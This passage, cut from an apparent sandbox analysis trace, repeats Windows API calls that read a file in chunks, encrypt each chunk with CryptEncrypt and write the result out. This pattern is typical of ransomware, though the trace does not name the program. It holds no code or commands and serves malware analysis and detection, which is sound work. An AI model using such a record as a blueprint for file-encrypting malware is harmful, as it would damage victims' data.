Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.992] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.992] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.992] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.992] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.992] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.992] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.992] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.992] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.992] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.992] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.992] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.992] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.992] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.993] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.993] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.993] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.993] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.993] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.993] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.993] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.993] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.993] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.993] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.993] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.993] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.993] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.993] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.993] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.994] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.994] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.994] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.994] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.994] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.994] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.994] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.994] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.994] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.999] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.999] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.999] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.000] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.000] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.000] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.000] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.000] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.000] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.000] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.000] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.000] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.000] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.000] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.000] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.001] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.001] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.001] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.001] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.001] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.001] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.001] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.001] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.001] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.001] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.001] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.001] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.001] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.001] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.002] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.002] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.002] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.002] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.002] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.002] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.002] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.002] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.002] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.002] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.002] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.002] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.002] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.002] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.003] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.003] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.003] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.003] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.003] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.003] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.003] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.003] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.003] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.003] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.003] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.003] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.003] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.003] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.004] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.004] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.004] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, 